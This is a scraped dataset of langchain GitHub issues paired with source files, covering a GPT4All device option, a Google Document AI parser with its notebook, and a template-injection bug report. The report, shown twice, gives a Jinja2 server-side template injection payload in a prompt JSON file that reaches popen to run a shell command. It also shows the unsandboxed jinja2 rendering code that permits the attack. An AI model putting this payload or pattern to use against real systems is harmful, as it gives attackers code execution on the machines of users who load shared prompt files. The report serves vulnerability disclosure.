https://github.com/openai/openai-python/issues/418#issuecomment-1525939500 # replace newlines, which can negatively affect performance. text = text.replace("\n", " ") return ( await async_embed_with_retry( self, input=[text], **self._invocation_params, ) )["data"][0]["embedding"] def embed_documents( self, texts: List[str], chunk_size: Optional[int] = 0 ) -> List[List[float]]: """Call out to LocalAI's embedding endpoint for embedding search docs. Args: texts: The list of texts to embed. chunk_size: The chunk size of embeddings. If None, will use the chunk size specified by the class. Returns: List of embeddings, one for each text. """ # call _embedding_func for each text return [self._embedding_func(text, engine=self.deployment) for text in texts] async def aembed_documents( self, texts: List[str], chunk_size: Optional[int] = 0 ) -> List[List[float]]: """Call out to LocalAI's embedding endpoint async for embedding search docs. Args: texts: The list of texts to embed. chunk_size: The chunk size of embeddings. If None, will use the chunk size specified by the class. Returns: List of embeddings, one for each text. """ embeddings = [] for text in texts: response = await self._aembedding_func(text, engine=self.deployment) embeddings.append(response) return embeddings def embed_query(self, text: str) -> List[float]: """Call out to LocalAI's embedding endpoint for embedding query text. Args: text: The text to embed. Returns: Embedding for the text. """ embedding = self._embedding_func(text, engine=self.deployment) return embedding async def aembed_query(self, text: str) -> List[float]: """Call out to LocalAI's embedding endpoint async for embedding query text. Args: text: The text to embed. Returns: Embedding for the text. """ embedding = await self._aembedding_func(text, engine=self.deployment) return embedding
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,486
Add device to GPT4All
### Feature request Hey guys! Thanks for the great tool you've developed. LLama now supports device and so is GPT4All: https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__ Can you guys please add the device property to the file: "langchain/llms/gpt4all.py" LN 96: ` device: Optional[str] = Field("cpu", alias="device") """Device name: cpu, gpu, nvidia, intel, amd or DeviceName.""" ` Model Init: ` values["client"] = GPT4AllModel( model_name, model_path=model_path or None, model_type=values["backend"], allow_download=values["allow_download"], device=values["device"] ) ` ### Motivation Necessity to use the device on GPU powered machines. ### Your contribution None.. :(
https://github.com/langchain-ai/langchain/issues/10486
https://github.com/langchain-ai/langchain/pull/11216
92683262f4a6c2db95c3aad40a6f6dfde2df43d1
c6d7124675902e3a2628559d8a2b22c30747f75d
"2023-09-12T09:02:19Z"
python
"2023-10-04T00:37:30Z"
libs/langchain/langchain/llms/gpt4all.py
from functools import partial from typing import Any, Dict, List, Mapping, Optional, Set from langchain.callbacks.manager import CallbackManagerForLLMRun from langchain.llms.base import LLM from langchain.llms.utils import enforce_stop_tokens from langchain.pydantic_v1 import Extra, Field, root_validator class GPT4All(LLM): """GPT4All language models. To use, you should have the ``gpt4all`` python package installed, the pre-trained model file, and the model's config information. Example: .. code-block:: python from langchain.llms import GPT4All model = GPT4All(model="./models/gpt4all-model.bin", n_threads=8) # Simplest invocation response = model("Once upon a time, ") """ model: str """Path to the pre-trained GPT4All model file.""" backend: Optional[str] = Field(None, alias="backend") max_tokens: int = Field(200, alias="max_tokens") """Token context window.""" n_parts: int = Field(-1, alias="n_parts") """Number of parts to split the model into. If -1, the number of parts is automatically determined.""" seed: int = Field(0, alias="seed") """Seed. If -1, a random seed is used.""" f16_kv: bool = Field(False, alias="f16_kv") """Use half-precision for key/value cache.""" logits_all: bool = Field(False, alias="logits_all") """Return logits for all tokens, not just the last token.""" vocab_only: bool = Field(False, alias="vocab_only") """Only load the vocabulary, no weights.""" use_mlock: bool = Field(False, alias="use_mlock") """Force system to keep model in RAM.""" embedding: bool = Field(False, alias="embedding") """Use embedding mode only.""" n_threads: Optional[int] = Field(4, alias="n_threads") """Number of threads to use.""" n_predict: Optional[int] = 256 """The maximum number of tokens to generate.""" temp: Optional[float] = 0.7 """The temperature to use for sampling.""" top_p: Optional[float] = 0.1 """The top-p value to use for sampling.""" top_k: Optional[int] = 40 """The top-k value to use for sampling.""" echo: Optional[bool] = False """Whether to echo the prompt.""" stop: Optional[List[str]] = [] """A list of strings to stop generation when encountered.""" repeat_last_n: Optional[int] = 64 "Last n tokens to penalize" repeat_penalty: Optional[float] = 1.18 """The penalty to apply to repeated tokens.""" n_batch: int = Field(8, alias="n_batch") """Batch size for prompt processing.""" streaming: bool = False """Whether to stream the results or not.""" allow_download: bool = False """If model does not exist in ~/.cache/gpt4all/, download it.""" client: Any = None #: :meta private: class Config: """Configuration for this pydantic object.""" extra = Extra.forbid @staticmethod def _model_param_names() -> Set[str]: return { "max_tokens", "n_predict", "top_k", "top_p", "temp", "n_batch", "repeat_penalty", "repeat_last_n", } def _default_params(self) -> Dict[str, Any]: return { "max_tokens": self.max_tokens, "n_predict": self.n_predict, "top_k": self.top_k, "top_p": self.top_p, "temp": self.temp, "n_batch": self.n_batch, "repeat_penalty": self.repeat_penalty, "repeat_last_n": self.repeat_last_n, } @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that the python package exists in the environment.""" try: from gpt4all import GPT4All as GPT4AllModel except ImportError: raise ImportError( "Could not import gpt4all python package. " "Please install it with `pip install gpt4all`." ) full_path = values["model"] model_path, delimiter, model_name = full_path.rpartition("/") model_path += delimiter values["client"] = GPT4AllModel( model_name, model_path=model_path or None, model_type=values["backend"], allow_download=values["allow_download"], ) if values["n_threads"] is not None: # set n_threads values["client"].model.set_thread_count(values["n_threads"]) try: values["backend"] = values["client"].model_type except AttributeError: # The below is for compatibility with GPT4All Python bindings <= 0.2.3. values["backend"] = values["client"].model.model_type return values @property def _identifying_params(self) -> Mapping[str, Any]: """Get the identifying parameters.""" return { "model": self.model, **self._default_params(), **{ k: v for k, v in self.__dict__.items() if k in self._model_param_names() }, } @property def _llm_type(self) -> str: """Return the type of llm.""" return "gpt4all" def _call( self, prompt: str, stop: Optional[List[str]] = None, run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> str: r"""Call out to GPT4All's generate method. Args: prompt: The prompt to pass into the model. stop: A list of strings to stop generation when encountered. Returns: The string generated by the model. Example: .. code-block:: python prompt = "Once upon a time, " response = model(prompt, n_predict=55) """ text_callback = None if run_manager: text_callback = partial(run_manager.on_llm_new_token, verbose=self.verbose) text = "" params = {**self._default_params(), **kwargs} for token in self.client.generate(prompt, **params): if text_callback: text_callback(token) text += token if stop is not None: text = enforce_stop_tokens(text, stop) return text
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,589
Add Google Cloud Document AI integration
### Feature request Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing. ### Motivation This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction. ### Your contribution I can implement this myself, I mostly want to understand where and how this could fit into the library. Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity. Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output.
https://github.com/langchain-ai/langchain/issues/10589
https://github.com/langchain-ai/langchain/pull/11413
628cc4cce8b4e6068dacc92836cc8045b94afa37
09c66fe04fe20b39d307df0419d742a7a28bab98
"2023-09-14T16:57:14Z"
python
"2023-10-09T15:04:25Z"
docs/docs_skeleton/docs/integrations/document_transformers/docai.ipynb
{ "cells": [ { "cell_type": "markdown", "id": "310fce10-e051-40db-89b0-5b5bb85cd145", "metadata": {}, "source": [ "# Document AI\n" ] }, { "cell_type": "markdown", "id": "f95ac25b-f025-40c3-95b8-77919fc4da7f", "metadata": {}, "source": [ ">[Document AI](https://cloud.google.com/document-ai/docs/overview) is a `Google Cloud Platform` service to transform unstructured data from documents into structured data, making it easier to understand, analyze, and consume. " ] }, { "cell_type": "markdown", "id": "275f2193-248f-4565-a872-93a89589cf2b", "metadata": {}, "source": [ "The module contains a `PDF` parser based on DocAI from Google Cloud.\n", "\n", "You need to install two libraries to use this parser:" ] }, { "cell_type": "code", "execution_count": null, "id": "34132fab-0069-4942-b68b-5b093ccfc92a", "metadata": {}, "outputs": [], "source": [ "!pip install google-cloud-documentai\n", "!pip install google-cloud-documentai-toolbox" ] }, { "cell_type": "markdown", "id": "51946817-798c-4d11-abd6-db2ae53a0270", "metadata": {}, "source": [ "First, you need to set up a [`GCS` bucket and create your own OCR processor](https://cloud.google.com/document-ai/docs/create-processor) \n", "The `GCS_OUTPUT_PATH` should be a path to a folder on GCS (starting with `gs://`) and a processor name should look like `projects/PROJECT_NUMBER/locations/LOCATION/processors/PROCESSOR_ID`. You can get it either programmatically or copy from the `Prediction endpoint` section of the `Processor details` tab in the Google Cloud Console." ] }, { "cell_type": "code", "execution_count": 2, "id": "ac85f7f3-3ef6-41d5-920a-b55f2939c202", "metadata": {}, "outputs": [], "source": [ "PROJECT = \"PUT_SOMETHING_HERE\"\n", "GCS_OUTPUT_PATH = \"PUT_SOMETHING_HERE\"\n", "PROCESSOR_NAME = \"PUT_SOMETHING_HERE\"" ] }, { "cell_type": "code", "execution_count": 1, "id": "48438efb-9f0d-473b-a91c-9f1e29c2539d", "metadata": {}, "outputs": [], "source": [ "from langchain.document_loaders.blob_loaders import Blob\n", "from langchain.document_loaders.parsers import DocAIParser" ] }, { "cell_type": "markdown", "id": "fad2bcca-1c0e-4888-b82d-15823ba57e60", "metadata": {}, "source": [ "Now, let's create a parser:" ] }, { "cell_type": "code", "execution_count": 3, "id": "dcc0c65a-86c5-448d-8b21-2e564b1903b7", "metadata": {}, "outputs": [], "source": [ "parser = DocAIParser(location=\"us\", processor_name=PROCESSOR_NAME, gcs_output_path=GCS_OUTPUT_PATH)" ] }, { "cell_type": "markdown", "id": "b8b5a3ff-650a-4ad3-a73a-395f86e4c9e1", "metadata": {}, "source": [ "Let's go and parse an Alphabet's take from here: https://abc.xyz/assets/a7/5b/9e5ae0364b12b4c883f3cf748226/goog-exhibit-99-1-q1-2023-19.pdf. Copy it to your GCS bucket first, and adjust the path below." ] }, { "cell_type": "code", "execution_count": 4, "id": "373cc18e-a311-4c8d-8180-47e4ade1d2ad", "metadata": {}, "outputs": [], "source": [ "blob = Blob(path=\"gs://vertex-pgt/examples/goog-exhibit-99-1-q1-2023-19.pdf\")" ] }, { "cell_type": "code", "execution_count": 5, "id": "6ef84fad-2981-456d-a6b4-3a6a1a46d511", "metadata": {}, "outputs": [], "source": [ "docs = list(parser.lazy_parse(blob))" ] }, { "cell_type": "markdown", "id": "3f8e4ee1-e07d-4c29-a120-4d56aae91859", "metadata": {}, "source": [ "We'll get one document per page, 11 in total:" ] }, { "cell_type": "code", "execution_count": 8, "id": "343919f5-35d2-47fb-9790-de464649ebdf", "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "11\n" ] } ], "source": [ "print(len(docs))" ] }, { "cell_type": "markdown", "id": "b104ae56-011b-4abe-ac07-e999c69494c5", "metadata": {}, "source": [ "You can run end-to-end parsing of a blob one-by-one. If you have many documents, it might be a better approach to batch them together and maybe even detach parsing from handling the results of parsing." ] }, { "cell_type": "code", "execution_count": 9, "id": "9ecc1b99-5cef-47b0-a125-dbb2c41d2224", "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "['projects/543079149601/locations/us/operations/16447136779727347991']\n" ] } ], "source": [ "operations = parser.docai_parse([blob])\n", "print([op.operation.name for op in operations])" ] }, { "cell_type": "markdown", "id": "a2d24d63-c2c7-454c-9df3-2a9cf51309a6", "metadata": {}, "source": [ "You can check whether operations are finished:" ] }, { "cell_type": "code", "execution_count": 10, "id": "ab11efb0-e514-4f44-9ba5-3d638a59c9e6", "metadata": {}, "outputs": [ { "data": { "text/plain": [ "True" ] }, "execution_count": 10, "metadata": {}, "output_type": "execute_result" } ], "source": [ "parser.is_running(operations)" ] }, { "cell_type": "markdown", "id": "602ca0bc-080a-4a4e-a413-0e705aeab189", "metadata": {}, "source": [ "And when they're finished, you can parse the results:" ] }, { "cell_type": "code", "execution_count": 11, "id": "ec1e6041-bc10-47d4-ba64-d09055c14f27", "metadata": {}, "outputs": [ { "data": { "text/plain": [ "False" ] }, "execution_count": 11, "metadata": {}, "output_type": "execute_result" } ], "source": [ "parser.is_running(operations)" ] }, { "cell_type": "code", "execution_count": 12, "id": "95d89da4-1c8a-413d-8473-ddd4a39375a5", "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "DocAIParsingResults(source_path='gs://vertex-pgt/examples/goog-exhibit-99-1-q1-2023-19.pdf', parsed_path='gs://vertex-pgt/test/run1/16447136779727347991/0')\n" ] } ], "source": [ "results = parser.get_results(operations)\n", "print(results[0])" ] }, { "cell_type": "markdown", "id": "87e5b606-1679-46c7-9577-4cf9bc93a752", "metadata": {}, "source": [ "And now we can finally generate Documents from parsed results:" ] }, { "cell_type": "code", "execution_count": 15, "id": "08e8878d-889b-41ad-9500-2f772d38782f", "metadata": {}, "outputs": [], "source": [ "docs = list(parser.parse_from_results(results))" ] }, { "cell_type": "code", "execution_count": 16, "id": "c59525fb-448d-444b-8f12-c4aea791e19b", "metadata": {}, "outputs": [ { "name": "stdout", "output_type": "stream", "text": [ "11\n" ] } ], "source": [ "print(len(docs))" ] } ], "metadata": { "environment": { "kernel": "python3", "name": "common-cpu.m109", "type": "gcloud", "uri": "gcr.io/deeplearning-platform-release/base-cpu:m109" }, "kernelspec": { "display_name": "Python 3 (ipykernel)", "language": "python", "name": "python3" }, "language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.10.12" } }, "nbformat": 4, "nbformat_minor": 5 }
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
10,589
Add Google Cloud Document AI integration
### Feature request Add integration for [Document AI](https://cloud.google.com/document-ai/docs/overview) from Google Cloud for intelligent document processing. ### Motivation This product offers Optical Character Recognition, specialized processors from specific document types, and built in Generative AI processing for Document Summarization and entity extraction. ### Your contribution I can implement this myself, I mostly want to understand where and how this could fit into the library. Should it be a document transformer? An LLM? An output parser? A Retriever? Document AI does all of these in some capacity. Document AI is designed as a platform that non-ML engineers can use to extract information from documents, and I could see several features being useful to Langchain (Like Document OCR to extract text and fields before sending it to an LLM) or using the Document AI Processors with Generative AI directly for the summarization/q&a output.
https://github.com/langchain-ai/langchain/issues/10589
https://github.com/langchain-ai/langchain/pull/11413
628cc4cce8b4e6068dacc92836cc8045b94afa37
09c66fe04fe20b39d307df0419d742a7a28bab98
"2023-09-14T16:57:14Z"
python
"2023-10-09T15:04:25Z"
libs/langchain/langchain/document_loaders/parsers/docai.py
"""Module contains a PDF parser based on DocAI from Google Cloud. You need to install two libraries to use this parser: pip install google-cloud-documentai pip install google-cloud-documentai-toolbox """ import logging import time from dataclasses import dataclass from typing import TYPE_CHECKING, Iterator, List, Optional, Sequence from langchain.docstore.document import Document from langchain.document_loaders.base import BaseBlobParser from langchain.document_loaders.blob_loaders import Blob from langchain.utils.iter import batch_iterate if TYPE_CHECKING: from google.api_core.operation import Operation from google.cloud.documentai import DocumentProcessorServiceClient logger = logging.getLogger(__name__) @dataclass class DocAIParsingResults: """A dataclass to store DocAI parsing results.""" source_path: str parsed_path: str class DocAIParser(BaseBlobParser): def __init__( self, *, client: Optional["DocumentProcessorServiceClient"] = None, location: Optional[str] = None, gcs_output_path: Optional[str] = None, processor_name: Optional[str] = None, ): """Initializes the parser. Args: client: a DocumentProcessorServiceClient to use location: a GCP location where a DOcAI parser is located gcs_output_path: a path on GCS to store parsing results processor_name: name of a processor You should provide either a client or location (and then a client would be instantiated). """ if client and location: raise ValueError( "You should provide either a client or a location but not both " "of them." ) if not client and not location: raise ValueError( "You must specify either a client or a location to instantiate " "a client." ) self._gcs_output_path = gcs_output_path self._processor_name = processor_name if client: self._client = client else: try: from google.api_core.client_options import ClientOptions from google.cloud.documentai import DocumentProcessorServiceClient except ImportError: raise ImportError( "documentai package not found, please install it with" " `pip install google-cloud-documentai`" ) options = ClientOptions( api_endpoint=f"{location}-documentai.googleapis.com" ) self._client = DocumentProcessorServiceClient(client_options=options) def lazy_parse(self, blob: Blob) -> Iterator[Document]: """Parses a blob lazily. Args: blobs: a Blob to parse This is a long-running operations! A recommended way is to batch documents together and use `batch_parse` method. """ yield from self.batch_parse([blob], gcs_output_path=self._gcs_output_path) def batch_parse( self, blobs: Sequence[Blob], gcs_output_path: Optional[str] = None, timeout_sec: int = 3600, check_in_interval_sec: int = 60, ) -> Iterator[Document]: """Parses a list of blobs lazily. Args: blobs: a list of blobs to parse gcs_output_path: a path on GCS to store parsing results timeout_sec: a timeout to wait for DocAI to complete, in seconds check_in_interval_sec: an interval to wait until next check whether parsing operations have been completed, in seconds This is a long-running operations! A recommended way is to decouple parsing from creating Langchain Documents: >>> operations = parser.docai_parse(blobs, gcs_path) >>> parser.is_running(operations) You can get operations names and save them: >>> names = [op.operation.name for op in operations] And when all operations are finished, you can use their results: >>> operations = parser.operations_from_names(operation_names) >>> results = parser.get_results(operations) >>> docs = parser.parse_from_results(results) """ output_path = gcs_output_path if gcs_output_path else self._gcs_output_path if output_path is None: raise ValueError("An output path on GCS should be provided!") operations = self.docai_parse(blobs, gcs_output_path=output_path) operation_names = [op.operation.name for op in operations] logger.debug( f"Started parsing with DocAI, submitted operations {operation_names}" ) is_running, time_elapsed = True, 0 while is_running: is_running = self.is_running(operations) if not is_running: break time.sleep(check_in_interval_sec) time_elapsed += check_in_interval_sec if time_elapsed > timeout_sec: raise ValueError( "Timeout exceeded! Check operations " f"{operation_names} later!" ) logger.debug(".") results = self.get_results(operations=operations) yield from self.parse_from_results(results) def parse_from_results( self, results: List[DocAIParsingResults] ) -> Iterator[Document]: try: from google.cloud.documentai_toolbox.wrappers.document import _get_shards from google.cloud.documentai_toolbox.wrappers.page import _text_from_layout except ImportError: raise ImportError( "documentai_toolbox package not found, please install it with" " `pip install google-cloud-documentai-toolbox`" ) for result in results: output_gcs = result.parsed_path.split("/") gcs_bucket_name = output_gcs[2] gcs_prefix = "/".join(output_gcs[3:]) + "/" shards = _get_shards(gcs_bucket_name, gcs_prefix) docs, page_number = [], 1 for shard in shards: for page in shard.pages: docs.append( Document( page_content=_text_from_layout(page.layout, shard.text), metadata={ "page": page_number, "source": result.source_path, }, ) ) page_number += 1 yield from docs def operations_from_names(self, operation_names: List[str]) -> List["Operation"]: """Initializes Long-Running Operations from their names.""" try: from google.longrunning.operations_pb2 import ( GetOperationRequest, # type: ignore ) except ImportError: raise ImportError( "documentai package not found, please install it with" " `pip install gapic-google-longrunning`" ) operations = [] for name in operation_names: request = GetOperationRequest(name=name) operations.append(self._client.get_operation(request=request)) return operations def is_running(self, operations: List["Operation"]) -> bool: for op in operations: if not op.done(): return True return False def docai_parse( self, blobs: Sequence[Blob], *, gcs_output_path: Optional[str] = None, batch_size: int = 4000, enable_native_pdf_parsing: bool = True, ) -> List["Operation"]: """Runs Google DocAI PDF parser on a list of blobs. Args: blobs: a list of blobs to be parsed gcs_output_path: a path (folder) on GCS to store results batch_size: amount of documents per batch enable_native_pdf_parsing: a config option for the parser DocAI has a limit on the amount of documents per batch, that's why split a batch into mini-batches. Parsing is an async long-running operation on Google Cloud and results are stored in a output GCS bucket. """ try: from google.cloud import documentai from google.cloud.documentai_v1.types import OcrConfig, ProcessOptions except ImportError: raise ImportError( "documentai package not found, please install it with" " `pip install google-cloud-documentai`" ) if not self._processor_name: raise ValueError("Processor name is not defined, aborting!") output_path = gcs_output_path if gcs_output_path else self._gcs_output_path if output_path is None: raise ValueError("An output path on GCS should be provided!") operations = [] for batch in batch_iterate(size=batch_size, iterable=blobs): documents = [] for blob in batch: gcs_document = documentai.GcsDocument( gcs_uri=blob.path, mime_type="application/pdf" ) documents.append(gcs_document) gcs_documents = documentai.GcsDocuments(documents=documents) input_config = documentai.BatchDocumentsInputConfig( gcs_documents=gcs_documents ) gcs_output_config = documentai.DocumentOutputConfig.GcsOutputConfig( gcs_uri=output_path, field_mask=None ) output_config = documentai.DocumentOutputConfig( gcs_output_config=gcs_output_config ) if enable_native_pdf_parsing: process_options = ProcessOptions( ocr_config=OcrConfig( enable_native_pdf_parsing=enable_native_pdf_parsing ) ) else: process_options = ProcessOptions() request = documentai.BatchProcessRequest( name=self._processor_name, input_documents=input_config, document_output_config=output_config, process_options=process_options, ) operations.append(self._client.batch_process_documents(request)) return operations def get_results(self, operations: List["Operation"]) -> List[DocAIParsingResults]: try: from google.cloud.documentai_v1 import BatchProcessMetadata except ImportError: raise ImportError( "documentai package not found, please install it with" " `pip install google-cloud-documentai`" ) results = [] for op in operations: if isinstance(op.metadata, BatchProcessMetadata): metadata = op.metadata else: metadata = BatchProcessMetadata.deserialize(op.metadata.value) for status in metadata.individual_process_statuses: source = status.input_gcs_source output = status.output_gcs_destination results.append( DocAIParsingResults(source_path=source, parsed_path=output) ) return results
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info windows 11 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. save the following data to pt.json ```json { "input_variables": [ "prompt" ], "output_parser": null, "partial_variables": {}, "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}", "template_format": "jinja2", "validate_template": true, "_type": "prompt" } ``` 2. run ```python from langchain.prompts import load_prompt loaded_prompt = load_prompt("pt.json") loaded_prompt.format(history="", prompt="What is 1 + 1?") ``` 3. the `dir` command will be execute attack scene: Alice can send prompt file to Bob and let Bob to load it. analysis: Jinja2 is used to concat prompts. Template injection will happened note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment. ### Expected behavior code should not be execute
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/langchain/prompts/base.py
"""BasePrompt schema definition.""" from __future__ import annotations import warnings from abc import ABC from typing import Any, Callable, Dict, List, Set from langchain.schema.messages import BaseMessage, HumanMessage from langchain.schema.prompt import PromptValue from langchain.schema.prompt_template import BasePromptTemplate from langchain.utils.formatting import formatter def jinja2_formatter(template: str, **kwargs: Any) -> str: """Format a template using jinja2.""" try: from jinja2 import Template except ImportError: raise ImportError( "jinja2 not installed, which is needed to use the jinja2_formatter. " "Please install it with `pip install jinja2`." ) return Template(template).render(**kwargs) def validate_jinja2(template: str, input_variables: List[str]) -> None: """ Validate that the input variables are valid for the template. Issues a warning if missing or extra variables are found. Args: template: The template string. input_variables: The input variables. """ input_variables_set = set(input_variables) valid_variables = _get_jinja2_variables_from_template(template) missing_variables = valid_variables - input_variables_set extra_variables = input_variables_set - valid_variables warning_message = "" if missing_variables: warning_message += f"Missing variables: {missing_variables} " if extra_variables: warning_message += f"Extra variables: {extra_variables}" if warning_message: warnings.warn(warning_message.strip()) def _get_jinja2_variables_from_template(template: str) -> Set[str]: try: from jinja2 import Environment, meta except ImportError: raise ImportError( "jinja2 not installed, which is needed to use the jinja2_formatter. " "Please install it with `pip install jinja2`." ) env = Environment() ast = env.parse(template) variables = meta.find_undeclared_variables(ast) return variables DEFAULT_FORMATTER_MAPPING: Dict[str, Callable] = { "f-string": formatter.format, "jinja2": jinja2_formatter, } DEFAULT_VALIDATOR_MAPPING: Dict[str, Callable] = { "f-string": formatter.validate_input_variables, "jinja2": validate_jinja2, } def check_valid_template( template: str, template_format: str, input_variables: List[str] ) -> None: """Check that template string is valid.""" if template_format not in DEFAULT_FORMATTER_MAPPING: valid_formats = list(DEFAULT_FORMATTER_MAPPING) raise ValueError( f"Invalid template format. Got `{template_format}`;" f" should be one of {valid_formats}" ) try: validator_func = DEFAULT_VALIDATOR_MAPPING[template_format] validator_func(template, input_variables) except KeyError as e: raise ValueError( "Invalid prompt schema; check for mismatched or missing input parameters. " + str(e) ) class StringPromptValue(PromptValue): """String prompt value.""" text: str """Prompt text.""" def to_string(self) -> str: """Return prompt as string.""" return self.text def to_messages(self) -> List[BaseMessage]: """Return prompt as messages.""" return [HumanMessage(content=self.text)] class StringPromptTemplate(BasePromptTemplate, ABC): """String prompt that exposes the format method, returning a prompt.""" def format_prompt(self, **kwargs: Any) -> PromptValue: """Create Chat Messages.""" return StringPromptValue(text=self.format(**kwargs))
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
4,394
Template injection to arbitrary code execution
### System Info windows 11 ### Who can help? _No response_ ### Information - [X] The official example notebooks/scripts - [ ] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [ ] Embedding Models - [X] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [ ] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction 1. save the following data to pt.json ```json { "input_variables": [ "prompt" ], "output_parser": null, "partial_variables": {}, "template": "Tell me a {{ prompt }} {{ ''.__class__.__bases__[0].__subclasses__()[147].__init__.__globals__['popen']('dir').read() }}", "template_format": "jinja2", "validate_template": true, "_type": "prompt" } ``` 2. run ```python from langchain.prompts import load_prompt loaded_prompt = load_prompt("pt.json") loaded_prompt.format(history="", prompt="What is 1 + 1?") ``` 3. the `dir` command will be execute attack scene: Alice can send prompt file to Bob and let Bob to load it. analysis: Jinja2 is used to concat prompts. Template injection will happened note: in the pt.json, the `template` has payload, the index of `__subclasses__` maybe different in other environment. ### Expected behavior code should not be execute
https://github.com/langchain-ai/langchain/issues/4394
https://github.com/langchain-ai/langchain/pull/10252
b642d00f9f625969ca1621676990af7db4271a2e
22abeb9f6cc555591bf8e92b5e328e43aa07ff6c
"2023-05-09T12:28:24Z"
python
"2023-10-10T15:15:42Z"
libs/langchain/langchain/prompts/loading.py
"""Load prompts.""" import json import logging from pathlib import Path from typing import Callable, Dict, Union import yaml from langchain.prompts.few_shot import FewShotPromptTemplate from langchain.prompts.prompt import PromptTemplate from langchain.schema import BaseLLMOutputParser, BasePromptTemplate, StrOutputParser from langchain.utils.loading import try_load_from_hub URL_BASE = "https://raw.githubusercontent.com/hwchase17/langchain-hub/master/prompts/" logger = logging.getLogger(__name__) def load_prompt_from_config(config: dict) -> BasePromptTemplate: """Load prompt from Config Dict.""" if "_type" not in config: logger.warning("No `_type` key found, defaulting to `prompt`.") config_type = config.pop("_type", "prompt") if config_type not in type_to_loader_dict: raise ValueError(f"Loading {config_type} prompt not supported") prompt_loader = type_to_loader_dict[config_type] return prompt_loader(config) def _load_template(var_name: str, config: dict) -> dict: """Load template from the path if applicable.""" # Check if template_path exists in config. if f"{var_name}_path" in config: # If it does, make sure template variable doesn't also exist. if var_name in config: raise ValueError( f"Both `{var_name}_path` and `{var_name}` cannot be provided." ) # Pop the template path from the config. template_path = Path(config.pop(f"{var_name}_path")) # Load the template. if template_path.suffix == ".txt": with open(template_path) as f: template = f.read() else: raise ValueError # Set the template variable to the extracted variable. config[var_name] = template return config def _load_examples(config: dict) -> dict: """Load examples if necessary.""" if isinstance(config["examples"], list): pass elif isinstance(config["examples"], str): with open(config["examples"]) as f: if config["examples"].endswith(".json"): examples = json.load(f) elif config["examples"].endswith((".yaml", ".yml")): examples = yaml.safe_load(f) else: raise ValueError( "Invalid file format. Only json or yaml formats are supported." ) config["examples"] = examples else: raise ValueError("Invalid examples format. Only list or string are supported.") return config def _load_output_parser(config: dict) -> dict: """Load output parser.""" if "output_parser" in config and config["output_parser"]: _config = config.pop("output_parser") output_parser_type = _config.pop("_type") if output_parser_type == "regex_parser": from langchain.output_parsers.regex import RegexParser output_parser: BaseLLMOutputParser = RegexParser(**_config) elif output_parser_type == "default": output_parser = StrOutputParser(**_config) else: raise ValueError(f"Unsupported output parser {output_parser_type}") config["output_parser"] = output_parser return config def _load_few_shot_prompt(config: dict) -> FewShotPromptTemplate: """Load the "few shot" prompt from the config.""" # Load the suffix and prefix templates. config = _load_template("suffix", config) config = _load_template("prefix", config) # Load the example prompt. if "example_prompt_path" in config: if "example_prompt" in config: raise ValueError( "Only one of example_prompt and example_prompt_path should " "be specified." ) config["example_prompt"] = load_prompt(config.pop("example_prompt_path")) else: config["example_prompt"] = load_prompt_from_config(config["example_prompt"]) # Load the examples. config = _load_examples(config) config = _load_output_parser(config) return FewShotPromptTemplate(**config) def _load_prompt(config: dict) -> PromptTemplate: """Load the prompt template from config.""" # Load the template from disk if necessary. config = _load_template("template", config) config = _load_output_parser(config) return PromptTemplate(**config) def load_prompt(path: Union[str, Path]) -> BasePromptTemplate: """Unified method for loading a prompt from LangChainHub or local fs.""" if hub_result := try_load_from_hub( path, _load_prompt_from_file, "prompts", {"py", "json", "yaml"} ): return hub_result else: return _load_prompt_from_file(path) def _load_prompt_from_file(file: Union[str, Path]) -> BasePromptTemplate: """Load prompt from file.""" # Convert file to a Path object. if isinstance(file, str): file_path = Path(file) else: file_path = file # Load from either json or yaml. if file_path.suffix == ".json": with open(file_path) as f: config = json.load(f) elif file_path.suffix == ".yaml": with open(file_path, "r") as f: config = yaml.safe_load(f) else: raise ValueError(f"Got unsupported file type {file_path.suffix}") # Load the prompt from the config now. return load_prompt_from_config(config) type_to_loader_dict: Dict[str, Callable[[dict], BasePromptTemplate]] = { "prompt": _load_prompt, "few_shot": _load_few_shot_prompt, }
closed
langchain-ai/langchain
